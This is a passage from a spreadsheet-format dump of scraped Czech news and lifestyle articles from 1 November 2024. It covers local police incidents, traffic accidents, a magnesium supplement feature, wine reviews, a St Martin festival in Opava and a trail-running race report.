Budou superbouře a polární záře častější? V květnu patřil obzor polárním zářím, které se v podobné intenzitě opakují jednou za 500 let. Zatímco se svět kochal, naše planeta čelila nejsilnější geomagnetické bouři za více než 20 let. Podle vědců šlo ale jen o ochutnávku toho, co nás čeká v nejbližších letech. Žhavme foťáky, chraňme elektroniku, Slunce se dostává do ráže. Mezi 3. a […] Alarmující data o kouření: Polovina mladých Čechů užívá nikotin Třetina Čechů starších 15 let užívá nikotin a mezi mladými od 15 do 24 let je tento údaj ještě vyšší. Nikotin v tomto věku užívá polovina z nich. Roste také počet mladých, kteří sahají k alternativám klasických cigaret, zejména k cigaretám elektronickým. Je to zdravější alternativa? Pokud jde o alkohol , zůstává Česká republika v […] Autor: Redakce Epochálnísvět.cz Rubrika transition_slide Věda</t>
  </si>
  <si>
    <t>259</t>
  </si>
  <si>
    <t>517</t>
  </si>
  <si>
    <t>20241101_28_3264797860_9003fa34408742a0fdbd.html</t>
  </si>
  <si>
    <t>9003fa34408742a0fdbd</t>
  </si>
  <si>
    <t>Muž se chtěl dostat do budovy vysokoškolských kolejí v Plzni</t>
  </si>
  <si>
    <t>Shrnutí Muž se chtěl dostat do budovy vysokoškolských kolejí v Plzni Na konci října vyrazili strážníci z Lochotína k vysokoškolským kolejím v Plzni . Neznámý muž se velmi neúnavně snažil proniknout do budovy. Incident se stal na konci října. Muž se do budovy vysokoškolských kolejí nažil dostat násilím. " Když neuspěl, zvolil strategii „ležím a křičím“. Po příjezdu hlídky už byl sice potichu, ale boty mu mezitím zmizely. Strážníci mu je našli, posadili ho na schody a provedli dechovou zkoušku, která vyloučila alkohol jako příčinu jeho podivného chování,“ uvedla Jana Pužmanová, mluvčí Městské policie Plzeň . Podivné chování muže pokračovalo. " Náhle se zvedl, začal plivat kolem sebe a znovu vyrazil ke vchodu. Strážníci mu zastoupili cestu, na což muž reagoval posměšky a divokým rozmachováním rukama kolem sebe. Veškeré výzvy, aby svého jednání zanechal, zcela ignoroval, a i přes důrazná varování se začal přibližovat ke strážníkovi a začal jej chytat za ruku,“ pokračovala policejní mluvčí a uvedla, že strážníci museli použít proti muži donucovací prostředky. Hlídka u muže chtěla provést test na drogy. Muž se rozhodl s hlídkou nespolupracovat, a do testu na drogy se zakousl. Test se tímto činem znehodnotil. " Vzhledem k jeho náladovým výkyvům a informaci, že byl předchozího večera ošetřen v nemocničním zařízení se zraněním hlavy, byli na místo přivoláni zdravotníci, kteří si jej převzali do své péče,“ uzavřela mluvčí policie. Foto: Městská policie Plzeň Autor: KR || QAP.cz - Vaše internetové noviny</t>
  </si>
  <si>
    <t>3670</t>
  </si>
  <si>
    <t>3080</t>
  </si>
  <si>
    <t>20241101_280_3243210951_ed2bbe37a1706180fb6b.html</t>
  </si>
  <si>
    <t>ed2bbe37a1706180fb6b</t>
  </si>
  <si>
    <t>Minerál, bez kterého se zkrátka neobejdeme. Vedle lepšího spánku a vyšší výkonnosti, snižuje hořčík i riziko některých onemocnění</t>
  </si>
  <si>
    <t>Minerál, bez kterého se zkrátka neobejdeme. Vedle lepšího spánku a vyšší výkonnosti, snižuje hořčík i riziko některých onemocnění 01.11.2024 Zdraví Není hořčík jako hořčík! Známe ho jako pomocníka při křečích, svalové únavě nebo pro lepší spánek. Věděli jste ale, že existuje hned několik jeho forem, z nichž každá řeší různé potřeby našeho těla? Magnesium bisglycinát je ideální pro regeneraci a snížení stresu, malát člověku pomáhá efektivně využívat energii a threonát zase stimuluje mysl. Je proto důležité nejen vybrat jeho správný druh, ale také vědět, kdy je vhodná denní doba jej užívat. Přestože je magnesium skutečně důležitým minerálem, které tělo potřebuje nejen pro svou regeneraci, ale také například pro správnou funkci nervového, metabolického a kardiovaskulárního systému, jako společnost jej přijímáme v kriticky malém množství. U zdravého dospělého člověka by se jeho optimální hladina měla pohybovat v rozmezí 0,75 – 0,95 miligramů na litr (mmol/l). Lidé se však k těmto hodnotám často ani nepřibližují a jejich hořčík rozpuštěný v krvi sotva dosahuje dolní hranice ideálního rozmezí. Studie ukazují, že nedostatečné zastoupení magnezia v těle člověka souvisí s celou řadou zdravotních komplikací, jako jsou křeče, migrény, únava nebo také problémy spojené s krevním tlakem. Pro opětovné doplnění potřebných zásob však nestačí v lékárně popadnout první krabičku s tabletkami, která nám padne do rukou. Je potřeba číst i zadní stranu přípravku, která nám prozradí, o jaký konkrétní druh se jedná. Jde totiž o minerál, jež lze užívat v různých formách, které cílí na různé aspekty zdraví a správné činnosti našeho těla. Svou roli v rámci vstřebávání a celkové reakce organismu na tento prvek navíc hraje také lidská individualita a genetická předurčenost. Jak se tedy jednoduše v magnesiu vyznat? Záleží na čase i primárním důvodu suplementace Jak již bylo zmíněno forem hořčíku existuje hned několik – každý s trochu jiným výsledným efektem. Nejde tedy obecně vyzdvihnout pouze jeden nejlepší a nejúčinnější typ. „Jednotlivé druhy hořčíku mají různou biologickou dostupnost a účinnost. Magnesium bisglycinát (či glycinát) je velmi dobře vstřebatelný, jemný na žaludek a efektivně uklidňuje tělo i mysl. Hodí se tedy pro podporu kvalitního spánku a snížení stresu. Naopak Magnesium malát dodává tělu energii a snižuje nežádoucí únavu. Magnesium taurinát je prospěšný pro zdraví srdce a cév, zatímco magnesium citrát a oxid léčí zácpu a pálení žáhy. Velmi důležitý je také magnesium threonát, jenž proniká do mozku, kde zesiluje pozornost a kognitivní funkce člověka. Je třeba zmínit, že existují také přípravky, které mohou obsahovat více než jen jeden druh. Pro zvýšení užitku jsou navíc častokrát doplněny také o další vitamíny a minerály. Není tedy pravidlem, že jednotlivé formy magnesia jde užívat pouze odděleně,“ vysvětluje jednotlivé formy hořčíku Ing. et Ing. Barbora Procházková , Ph.D., jež se mimo jiné podílí také na vývoji genetických testů a testování střevního mikrobiomu ve společnosti Chromozoom. Vždy tedy záleží, co chceme hořčíkem řešit. Potřebujeme podpořit celodenní energii a soustředění na práci? Či se naopak potýkáme se špatným spánkem a dlouhým procesem usínání? Od důvodu suplementace se poté odvíjí i doba užívání. Magnesium bisglycinát je vhodné přijímat v odpoledních hodinách, večer před spaním nebo také hned po tréninku, jelikož uvolňuje svaly, podporuje jejich regeneraci a zklidňuje nervový systém v těle. Spánek je proto daleko hlubší a kvalitnější. Naopak magnesium malát bychom měli doplnit hned ráno či krátce před cvičením. Pro své energizující účinky je vhodný například pro jedince trpící chronickou únavou. Raději přírodní a nikdy ne nalačno! Zamyslet bychom se měli také nad chemickou formou suplementovaného magnesia. Organický hořčík, jako je například citrát či glycinát, na sebe naváže přírodní látky v podobě aminokyselin nebo kyselin, které jsou ze své podstaty tělu bližší. Proto je i jejich výsledná vstřebatelnost daleko vyšší, než je tomu u anorganických forem, které mnohdy stojí jen pár korun a dají se sehnat takřka všude. Člověk si ale z umělého hořčíku, do které řadíme třeba magnesium oxid či síran, kvůli anorganickým sloučeninám vezme jen velmi malé množství aktivních látek. Je proto více než důležité zaměřit se hlavně na organické formy, které jsou sice dražší, pro lidské zdraví však mnohem přínosnější. Pozor ale! Hořčík bychom nikdy neměli suplementovat na prázdný žaludek. Vedle nižší vstřebatelnosti by nás totiž mohly potkat i nepříjemné zažívací problémy. Magnesium tedy vždy společně s jídlem. Abychom z přijímaného hořčíku vytěžili co možná nejvíc, hodí se jej doplňovat s určitými vitamíny, které jeho účinky maximalizují. „Pro lepší absorpci je užitečný vitamin D. V Chromozoom nabízíme doplněk stravy SUPERMg, který vedle šesti chelátových forem hořčíku obsahuje právě také D3 pro maximalizaci vstřebatelnosti a podpoře celkového účinku. Suplementace magnesia společně s vitamínem B6 zase zvyšuje a podporuje využití v těle, což je přínosné například pro snížení stresu. Je potřeba myslet také na vzájemnou rovnováhu s vápníkem, který podporuje svalovou kontrakci. Aby tedy nedocházelo ke svalovým křečím, vysokému tlaku a zvýšenému riziku srdečních chorob, je potřeba hořčík doplňovat v dostatečném množství v závislosti na hladinách vápníku v těle. Naopak s čím by se hořčík kombinovat určitě neměl je zinek a železo. Ty totiž snižují jeho vstřebatelnost v těle,“ komentuje Procházková . Důležité je to nepřehánět Ačkoliv se jedná o skutečně nepostradatelný minerál pro optimální funkci lidského organismu, některé jeho formy jsou více dráždivé než jiné. Jde především o magnesium citrát a oxid, které jsou při nevhodném dávkování velmi projímavé. Vedle nepříjemného průjmu se člověk může potýkat také s nevolností a křečemi do břicha. Těžší symptomy poté mohou zahrnovat i zmatení, ospalost, nízký krevní tlak, svalovou slabost či dokonce arytmii srdce. Přestože je předávkování hořčíkem velmi ojedinělé, určitě není nemožné. Genetička Procházková dodává, že ve vzácných případech může nadměrný příjem vést až k hypermagnezémii, tedy vysoké hladině hořčíku v krvi: „Obecně se uvádí, že hypermagnezémie může nastat při dávkách kolem 5000 mg (5 g). U lidí s ledvinovým onemocněním může problém nastat i nižší dávka, například 1000–2000 mg denně. Výsledkem jsou dýchací potíže, nepravidelný srdeční rytmus či srdeční zástava, která postihuje především lidi s poruchami ledvin.“ Je proto více než důležité dodržovat doporučený denní příjem. A kolik hořčíku naše tělo potřebuje? Optimální množství pro muže se pohybuje okolo 400–420 mg. Zdravá dospělá žena by měla přijímat zase 310–320 mg. U kojících a těhotných se poté dávka lehce navyšuje. Je důležité ale přihlédnout k aktuální hmotnosti, od které se poté přesná hodnota vypočítá. Orientačně se uvádí, že denní potřeba hořčíku je 6 mg na kilogram naší váhy. Člověk vážící 70 kg by tedy každý den měl přijmout 420 mg. Genetická rezistence, či určitý druh intolerance? Výsledný efekt magnezia se u každého z nás může projevovat jinak. Nadměrný příjem soli, chronický stres, příliš kofeinu v těle, kouření a alkohol . Pokud náš životní styl formují především tyto zlozvyky, může docházet ke snížení pozitivního dopadu pravidelné suplementace. Všechny tyto faktory mají totiž velmi negativní dopad na vstřebatelnost hořčíku v těle. Někteří z nás dokonce mohou trpět určitou formou intolerance na některé tipy magnesia. „Pro lidi s citlivým trávicím traktem může být magnesium citrát velmi problematický a příliš agresivní. V těchto případech se proto hodí tento typ vyměnit za jemnější variantu,“ dodává Procházková . Ani DNA a dědičné predispozice však není dobré přehlížet. Některé varianty genů, například TRPM6, mají značný vliv na koordinaci příjmu tohoto minerálu v ledvinách a střevech. Pokud naše genetická výbava obsahuje určité formy mutace, může dojít ke snížené schopnosti vstřebávání hořčíku, která je častou příčinou již zmiňované hypermagnezémie. Dalším genem, který řídí hladinu hořčíku v těle, je CNNM2. V lepším případě mohou některé jeho polymorfismy vést ke zlepšení vstřebatelnosti, na druhou stranu však jiné mutace tohoto genu zvyšují riziko nedostatku či dokonce úplné ztráty hořčíku. Pro snížení fyzických i duševních onemocnění Pravidelná suplementace nepřináší ovoce nejen z krátkodobého hlediska v pohodě kvalitního spánku či zvýšené energie během sportovním výkonu. Účinný je také při léčbě závažných chorob. Magnesium do značné míry snižuje příznaky ale i samotná rizika projevu určitých genetických onemocnění. Hraje totiž významnou roli ve stovkách biochemických procesů, včetně regulace genové exprese. Například u lidí s předpoklady k srdečním problémům napomáhá pravidelný příjem hořčíku koordinovat krevní tlak a udržovat správný tlukot srdce. Obecně je také velmi užitečný v rámci kontroly krevního cukru a zlepšuje citlivost organismu na inzulín. „Pravidelná suplementace hořčíku může zlepšit metabolismus glukózy a snížit riziko komplikací spojených s vysokou hladinou krevního cukru, což může být obzvláště přínosné pro jedince se zvýšeným genetickým rizikem cukrovky,“ vysvětluje genetička. Pozitivní dopad magnezia se projevuje také na naší náladě. Tento minerál totiž mimo jiné zajišťuje také regulaci neurotransmiterů, jako jsou serotonin, glutamát a GABA, které ovlivňují nejen nervový systém, ale také naši emocionální rovnováhu. Pravidelný příjem hořčíku se tedy projevuje i na mentálním nastavení a celkovém rozpoložení.</t>
  </si>
  <si>
    <t>1080</t>
  </si>
  <si>
    <t>20241101_281_3243212183_9f3f84b8c03dff8651b3.html</t>
  </si>
  <si>
    <t>9f3f84b8c03dff8651b3</t>
  </si>
  <si>
    <t>Řidič na křižovatce v&amp;nbsp;Přerově smetl mladistvého motorkáře</t>
  </si>
  <si>
    <t>Řidič na křižovatce v&amp;nbsp; Přerově smetl mladistvého motorkáře Řidič na křižovatce v Přerově smetl mladistvého motorkáře Mladistvého motorkáře srazil ve čtvrtek odpoledne na křižovatce v Přerově řidič osobního vozidla značky Ford. Po nehodě tvrdil, že motorkáře neviděl. Mladík skončil v nemocnici, sdělila Novinkám v pátek policejní mluvčí Miluše Zajícová. Nehoda se stala na křižovatce ulic Klivarova, Dvořákova a Vsadsko . Věk účastníků nehody policie neupřesnila. V případě mladistvého se pohybuje mezi 15 a 18 lety. Řidič auta jel po vedlejší komunikaci na ulici Klivarova a hodlal projet křižovatku v přímém směru na ulici Vsadsko . Vypověděl, že se před vjezdem do křižovatky rozhlédl a viděl pouze dodávkové vozidlo, které již křižovatkou projíždělo. „Proto se rozhodl, že bude po jeho projetí pokračovat v přímém směru jízdy. V okamžiku, kdy vjel do křižovatky, spatřil po pravé straně motocykl, který řídil mladistvý motorkář jedoucí od ulice Dvořákova směrem k nedalekému kruhovému objezdu,“ uvedla Zajícová. Na danou situaci již nestihl zareagovat a došlo ke střetu. Řidič fordu uvedl, že měl motocyklistu schovaného za dodávkovým vozidlem, a proto jej přehlédl. Po střetu s vozidlem motocyklista přepadl přes řídítka a zůstal ležet na komunikaci. „Na místo byla přivolána záchranná služba, která sraženého motorkáře na místě ošetřila a poté převezla na další vyšetření do nemocnice,“ doplnila policejní mluvčí. Řidiči se na místě dopravní nehody podrobili dechové zkoušce na alkohol s negativními výsledky. Hmotná škoda byla předběžně stanovena na 50 tisíc korun. Autor: Miloslav Hradil Autor Miloslav Hradil</t>
  </si>
  <si>
    <t>2220000</t>
  </si>
  <si>
    <t>2020000</t>
  </si>
  <si>
    <t>20241101_282_3243663081_06d268c3eb946540337f.html</t>
  </si>
  <si>
    <t>06d268c3eb946540337f</t>
  </si>
  <si>
    <t>Získej gola sadu + pivo za FEBI</t>
  </si>
  <si>
    <t>Získej gola sadu + pivo za FEBI Platnost akce: 1. – 30. 11. 2024 Nakupujte od nás kompletní sortiment značky FEBI a získejte zajímavé odměny! Za každých 15.000 Kč bez DPH gola sada KS-Tools + 5 l soudek německého piva Autor: Text: | redakce || redakce</t>
  </si>
  <si>
    <t>98</t>
  </si>
  <si>
    <t>276</t>
  </si>
  <si>
    <t>20241101_283_3243256170_3fa8ede856b5a383c58b.html</t>
  </si>
  <si>
    <t>3fa8ede856b5a383c58b</t>
  </si>
  <si>
    <t>Senior ve Veselíčku vjel do protisměru: sražené auto skončilo v příkopu</t>
  </si>
  <si>
    <t>Senior ve Veselíčku vjel do protisměru: sražené auto skončilo v příkopu „Senior se zřejmě plně nevěnoval řízení a při průjezdu zatáčkou přejel do levé poloviny vozovky, kde se střetl s projíždějícím osobním autem Škoda Octavia, jehož řidič jel opačným směrem. Vozidlo Škoda po střetu skončilo v silničním příkopu,“ popsala policejní mluvčí Michaela Lébrová. Nehody Ke zranění osob nedošlo. Provedené dechové zkoušky přítomnost alkoholu u obou řidičů vyloučily. Při dopravní nehodě vznikla škoda za více než 130 tisíc korun. Autor: Jana Kodysová Autor Jana Kodysová Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>6800</t>
  </si>
  <si>
    <t>5580</t>
  </si>
  <si>
    <t>20241101_284_3265290209_dfe5600cb7ab47413c1e.html</t>
  </si>
  <si>
    <t>dfe5600cb7ab47413c1e</t>
  </si>
  <si>
    <t>Jak životní styl Insta-celebrit a trocha zbytku alkoholu dělají z Yuppie generace hvězdy večírků</t>
  </si>
  <si>
    <t>Jak životní styl Insta-celebrit a trocha zbytku alkoholu dělají z Yuppie generace hvězdy večírků autor: Redakce Nezdrave.cz | 01.11.2024 | Kecy Žijeme v divném světě, kde je sláva na dosah ruky, pokud víte, jak správně zvednout selfie a přitom držet v ruce flašku nějakého cool drinku. Na našich instagramových feedech se střídají obrázky luxusních restaurací, extatických večírků a momentů zachycených v beztak nudných situacích, které by bez promyšleného filtru a dobře načasovaného úsměvu vypadaly jako záznamy z osmdesátých let. Yuppie generace, podobně jako superstar v dávném Hollywoodu , touží po uznání a neustálém povzbuzení. A tak se zrodila nová éra – éra těch, kdo se snaží co nejvíc žít, jako by zítra mělo vše skončit. Ve světě Instagramu je k dispozici neomezené množství filtrů, kterými můžete obstříkat svůj život, ale ve skutečnosti zjistíme, že nic z toho nezamění skutečné zážitky. Podle nedávného výzkumu se prokázalo, že trávit více než sedm hodin na sociálních sítích týdně může snížit vaši schopnost zažívat autentickou radost o necelých 25 procent. Cože? To je jako kdybychom se z vlastní zábavy stali stíny, co jen přihlížejí, jak trávíme čas sledující životy ostatních. Zajímavé je, že ti, kdo se méně soustředí na svoje “stočení stránek” a více se věnují prožitkům, se udržují ve veselém rozpoložení. Šéfkuchař, detox a překvapivá pravda o večírcích Tyhle Insta celebrity se proslavily nejen tím, co nosí nebo kde se objevují, ale i jak si stylově užívají život. Na vaše oslavy jsou zváni lidé, co umí skvěle míchat drinky, a šéfkuchař, který má na triku vyváženou směs guláše s nějakým tím fusion twistem z Japonska . Ale co se ale nestane po dvou hodinkách konzumace? Když inflamace téhle sváteční atmosféry praská ve švech, člověče, to je pak teprve cirkus! Všichni tancují, mají “nervy” na procházky do nebes a s nimi přichází i nezřídka na povrch i touha vyzkoušet detox. Co si tam vzít? Džus s detoxikovanými bylinkami? Ale pozor! Ať už je vaše detoxování jakkoli sofistikované, existuje jedno překvapení, které vás naprosto srazí do takzvaného “real-world”. Mnoho odborníků se shoduje na tom, že v porovnání s prokrastinací je v současné společnosti není důležité učit se žít bez alkoholu , ale spíše umět se naučit rozlišovat mezi skutečnými zážitky a těmi, jež skládáme pohromadě jako časopis v putice – místy pomačkané, ale v jádru zajímavé. Tím pádem je dobré mít na paměti, že i hříchy těla a taková ta úprava stravy k nám patří v kombinaci s vítězným úsměvem na fotkách. Válka online a offline světa Yuppie generace se často ocitá uprostřed přetahování mezi online vzory a skutečným životem. Dnešní svět si žádá, abyste byli “na příjmu” stále, ale co se stane, když pak zjistíte, že vám chybí nesmírně cenné „skutečné“ interakce? Kouzelné konverzace, co vám přihrají inspiraci, přejdou vám do digitální bubliny a – víte jak to je – v patové situaci vás brzy připraví o radost, až dosednete s přáteli v hospodě, abyste si vyhledali to, co dělají jiní. Už pamětníci vzpomínají na dobu, kdy bylo naprosto jedno, co říká internet, a přátelství vyžadovalo oči do očí. Dneska se zdá, jako by byl hnedka po našem outfitování a s trochou toho stylingu náš život zaštítěn fiktivním glamem. Když však zavřete okna a přepnete do reálného boxu vzpomínek, najednou uvidíte své staré kamarády, usmívající se s námi u piva , že si uhrajeme karaoke, a to je ten moment, co se nám vryje do paměti daleko víc, než jak na jedné noze elegantně tančit před obrazovkami. Tak jak to nakonec vidíme? Možná je to o přijímání ostrých pravd a lehkých decepcí. Život je bláznivý kolotoč, ve kterém se povalují stejně ty hektolitry alkoholu jako hromady příspěvků na Instagramu. Abychom se tak nějak pobavili, stačí občas se odhodit do vlny reality, zapomenout na iluze virtuální oblohy a vychutnat si ten neuhlazený, nekompromisní styl života. Takže zvedněte skleničku, nebo flašku čehokoli, a nechte to prodat – ať žije dnes a teď, bez filtru! Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_285_3265273153_eae565281dbd28a81769.html</t>
  </si>
  <si>
    <t>eae565281dbd28a81769</t>
  </si>
  <si>
    <t>Dopravní nehoda v Přerově: Srážka osobního vozu s motocyklistou</t>
  </si>
  <si>
    <t>Dopravní nehoda v Přerově : Srážka osobního vozu s motocyklistou 1. listopadu 2024 V Přerově na křižovatce ulic Klivarova, Dvořákova a Vsadsko došlo včera před druhou hodinou odpolední k vážné dopravní nehodě. Řidič osobního vozu značky Ford vjel na křižovatku z vedlejší silnice Klivarova, aby pokračoval v přímém směru na ulici Vsadsko . Podle jeho výpovědi se před vjezdem do křižovatky rozhlédl a viděl pouze dodávkové vozidlo, které bylo za úrovní křižovatky, proto se rozhodl pokračovat. Když vjel do křižovatky, z pravé strany zpozoroval mladistvého motocyklistu jedoucího směrem od ulice Dvořákova ke kruhovému objezdu. Na situaci již nestihl zareagovat, což vedlo k nevyhnutelnému střetu. Řidič fordu uvedl, že měl motocykl schovaný za dodávkovým vozidlem, proto ho přehlédl. Po srážce motocyklista přepadl přes řídítka a zůstal ležet na vozovce. Na místo nehody dorazila záchranná služba, která zraněného motorkáře na místě ošetřila a poté převezla na vyšetření do nemocnice. Oba řidiči se podrobili dechové zkoušce na alkohol , která dopadla negativně. Hmotná škoda způsobená nehodou byla předběžně vyčíslena na 50 000 korun. Autor: rej INZERCE Autor: rej Autor person rej</t>
  </si>
  <si>
    <t>203</t>
  </si>
  <si>
    <t>579</t>
  </si>
  <si>
    <t>20241101_286_3243181952_c10e15b8a9c58ea6d0ff.html</t>
  </si>
  <si>
    <t>c10e15b8a9c58ea6d0ff</t>
  </si>
  <si>
    <t>Svatý Martin se svou družinou už brzy navštíví Opavu</t>
  </si>
  <si>
    <t>Svatý Martin se svou družinou už brzy navštíví Opavu V Opavě se letos opět rozprostřou oslavy svatého Martina a Svatomartinských vín potěší nejenom milovníky vína , ale též rodiče a jejich děti. Svatomartinská vinná stezka naláká místní i přespolní zájemce na pouť napříč městem se zastávkami ke „koštu“ desítek druhů Svatomartinských a mladých vín. „Vinařský fond letos umožnil výjimečně zahájit prodej Svatomartinských vín ne až 11. listopadu, ale už od pátku 8. listopadu, což nám umožňuje otevřít Svatomartinskou vinnou stezku tento den,“ vysvětluje ředitel Turistické oblasti Opavské Slezsko Jan Černý . Vinaři se na stezku mohou v pátek vydat od 16 hodin a kromě procházky a ochutnávání moku si mohou popovídat se známými, které třeba už dlouho neviděli. Opavsko Tradiční Svatomartinské slavnosti budou mít v pondělí od 11.11 hodin hlavní děj na Horním náměstí a zahájí je slavnostní fanfára z ochozu věže Hláska. Současně se otevřou stánky se Svatojánskými víny a lákavými specialitami. Odpoledne projde městem svatomartinský průvod v čele se svatým Martinem . Vyjde v 15.30 hodin od Obecního domu a zamíří na Horní náměstí. Doprovod mu budou dělat folklorní soubory opavského Střediska volného času s cimbálovou muzikou a postupně se k němu mohou připojit i přihlížející Opavané. Opavsko Na Horním náměstí přivítá svatého Martina primátor Tomáš Navrátil , otevřou Svatomartinské víno a slavnostně si připijí. Návštěvníky pak budou moci využít možnost kupování vín a nebo občerstvení. Pro vychutnání vín bude ve stánku Opavského Slezska k zapůjčení zálohovaná vínová sklenička, kterou pak mohou po uvážení zase vrátit proti záloze nebo si ji ponechat jako milou vzpomínku. Kromě degustace a povídání se známými budou na náměstí sledovat rytířské i pážecí turnaje, pohádku pro děti a ke svezení budou připravené kočáry s koňmi. K programu se připojí cimbálová muzika a tanečníci. Nikdo z přítomných se až do 18.30 hodin, kdy všechno skončí, rozhodně nudit nebude. Autor: Jitka Hrušková Autor person Jitka Hrušková</t>
  </si>
  <si>
    <t>62490</t>
  </si>
  <si>
    <t>50100</t>
  </si>
  <si>
    <t>20241101_287_3265260076_63981e3de92356d4420f.html</t>
  </si>
  <si>
    <t>63981e3de92356d4420f</t>
  </si>
  <si>
    <t>Víno Ryzlink rýnský 2019, pozdní sběr, Víno Hradil</t>
  </si>
  <si>
    <t>Víno Ryzlink rýnský 2019, pozdní sběr, Víno Hradil /100 29. 12. 2023 „Tohle víno vás nevystřelí z trenek, ale je dobře pitelné, na popíjení s přáteli na party vhodné. Měla jsem z něj trochu strach, jelikož mám Šomana spojeného se super bílými jako RV nebo CH, ale toto červené je opravdu na pohodu... - je hladké, nic nepřekáží...“ /100 25. 8. 2024 „Sytější, rubínově červená barva, s úzkým, cihlovým meniskem a velmi dobrou viskozitou. Výrazně aromatická, čistá, intenzivnější vůně, snoubí tmavé lesní bobulové ovoce, borůvky, ostružiny a brusinky, s příjemnými aromaty ušlechtilého dřeva a sladkého koření, s podtónem pražených kakaových bobů. Středně plná, šťavnatá, pikantně kořenitá suchá chuť, s tóninou lesního ovoce z vůně, obohacenou o višně, hebké tříslo a jemnou ovocnou kyselinku. Delší ovocný závěr, se sladkým tříslem a lehkou stopou hořké čokolády. Velmi příjemně pitelné, aromatické, lehké, hebké, typicky letní víno - protože díky nižšímu alkoholu se dá pít i v létě.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241101_288_3265247755_ecdef8d7be80f5cae231.html</t>
  </si>
  <si>
    <t>ecdef8d7be80f5cae231</t>
  </si>
  <si>
    <t>Víno Chardonnay 2023, moravské zemské víno, Vinařství Vavrys</t>
  </si>
  <si>
    <t>Víno Chardonnay 2023, moravské zemské víno , Vinařství Vavrys Česká republika , oblast Morava , Slovácká podoblast, obec Mikulčice, trať Kněžské 85 /100 1. 11. 2024 „Čistá, širá, bledě žlutozelená barva s jemnými slámovými odlesky a výraznou viskozitou. Plná, čistá, intenzivní, mnohovrstevná, svěží, jemně kořenitá ovocná vůně, dokonale snoubí vanilkový lusk a zralé citrusy, s celým spektrem tropického ovoce, zejména banánu a ananasu. Plná, harmonická, šťavnatá, suchá, pocitově však lehce nasládlá chuť, s tóninou přezrálého exotického ovoce z buketu, jemně kořenitá, s lehkou minerální stopou a výraznější citrusovou kyselinkou. Dlouhý, elegantní závěr.“ (0) /100 25. 7. 2024 Výborné víno : Špičkově provedené odrůdové víno . Čisté s delší dochutí. Často nejlepší v poměru kvality a ceny. (0) Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241101_289_3244077778_2fb418ffddc0cc1ae910.html</t>
  </si>
  <si>
    <t>2fb418ffddc0cc1ae910</t>
  </si>
  <si>
    <t>Po nehodě se opilý řidič snažil marně utéct</t>
  </si>
  <si>
    <t>Po nehodě se opilý řidič snažil marně utéct SVITAVSKO – S ohledem na dopravní nehodu způsobenou pod vlivem alkoholu hrozí řidiči až tříletý pobyt za mřížemi. Případ se odehrál v sobotu okolo 18. hodiny. Řidič silně ovlivněný alkoholem sednul za volant svého vozidla značky WV a z Koclířova se rozjel směrem do Svitav , kde si potřeboval vybrat hotovost z bankomatu. Během této zastávky si všimnul, že má prázdné kolo, které se pokoušel vyměnit. To se mu ovšem nepodařilo a ve své jízdě pokračoval dál. Nezastavil ho dokonce ani náraz do jednoho ze zaparkovaných vozidel u svitavské nemocnice. Po několika kilometrech už byl ale řidič na silnici I/34 ve směru zpět na Koclířov donucen zastavit z důvodu devastačního poškození kola. V té samé chvíli už u něj byli policisté z oddělení hlídkové služby, které na lince 158 zalarmoval všímavý svědek. Policisté chtěli muže zkontrolovat, ten však místo pozdravu začal utíkat do pole, kde ho muži zákona rychle doběhli a zadrželi. U 67letého řidiče byla provedena dechová zkouška na alkohol , která byla pozitivní s výsledkem přes 1,8 promile. Policisté ve věci zahájili úkony trestního řízení pro podezření ze spáchání trestného činu ohrožení pod vlivem návykové látky. V případě odsouzení řidiči hrozí trest odnětí svobody až na 3 roky. 1. listopadu 2024 por. Mgr. Iveta Kopecká tisková mluvčí Policie ČR Pardubického kraje Roztrhaná pneumatika</t>
  </si>
  <si>
    <t>20241101_29_3289746694_b39e820ce5ac6505534e.html</t>
  </si>
  <si>
    <t>b39e820ce5ac6505534e</t>
  </si>
  <si>
    <t>Dvě třetiny nahoru, jedna dolů. Infinitní trail okolo Gasteintalu</t>
  </si>
  <si>
    <t>Dvě třetiny nahoru, jedna dolů. Infinitní trail okolo Gasteintalu Tomáš Nohejl 1. 11. 2024 Každý rok (nejmíň) jeden pěkný velký závod. Tak zní motivační mantra stárnoucího běžce. Zářijový Infinite Trails v Gasteintalu ji letos plně naplnil. Tak pojďme hnedle vzhůru do akce. Vyráží se časně z miniamfiteátru na kolonádě Bad Hofgasteinu . Šedesátníci (délkou trati) ještě skoro za tmy v šest, týmy v sedm už s vrcholky ozářenými sluncem. My, třicátníci, v půl osmé ještě v chladivém ranním oparu. Míříme lázeňským parkem podél říčky k první pastvině Schlossalm. Až po proběhnutí ptačí naučnou stezkou a vystoupání prvních výškových metrů zříme v prvním traversu nad údolím tu krásu. Ozařují nás a ohřívají paprsky, rukávy mizí do kapsy, ale jen pár metrů pod námi zakrývá celé údolí ještě mlžná peřina jakoby signalizující nadcházející podzim. Rozbíhám se zvolna s jasnou strategií. Prvních dvacet do kopce se udržet v takové kondici, abych následujících deset seběhu nekřečoval, a mohl závodit. S respektem k 1859 metrům, které musím zdolat. Nahoru i dolů. Jen si běžte, nenervím se, když přecházím do (svižné) chůze i v místech, kde bych (byl býval) měl běžet. Pokouším se zavěsit za pohlednější zadeček, ostatně činím tak od tuzemských trailových začátků a tempového spříznění s Kateřinou Krieglovou, a většinou to vychází. Přes horské louky a lesní stezky šplháme dál kolem soutěsky Mitteregg Gut směrem na Angertal ještě přes Angerbachgraben. Jsme někde na sedmém, odměnou je první občerstvovačka, zatím stačí popít. Než se vydáme znovu do skutečného kopce, až později přesně analyzovaného 650 metry výškového rozdílu na čtyřech kilometrech. Až po nich se konečně zase rozbíháme v Gadaunerer Hochalmen, úchvatném panoramatickém patře hor. Kus po asfaltce, dál v kamenitých korytech mezi kravami. Opojení trvá krátce, nastupuju do řady do koridoru a ve strmé cik cak linii přes Kreilingersteig na Ochsenriedel. Ale jo, ty klacky jsem měl vzít, lituju, a přestávám nadávat hůlkařům, kteří se mně dosud motali pod nohama. Závidím jim. Na mé výkonnostní úrovni jsou v mírné převaze proti nám, hrdinům, kteří berou gasteinské kopce nalehko. U horní stanice Schlosshochalmlift oceňuju bufet s gely a rozinkami, salám i sýr nechávám, dolívám si vodou připravenou kaši Perpetuum. Ještě kus nahoru… nadechnu se u vodní nádrže Schlossalm. Podle plánů bývá obvykle plus mínus kilometr, upínám se samozřejmě k nižší cifře. Osmnáctka ale bliká na horní stanici další lanovky… a šipka ukazuje stále vzhůru. Scheisse!!! Prudká sjezdovka s příznačným názvem Höhe 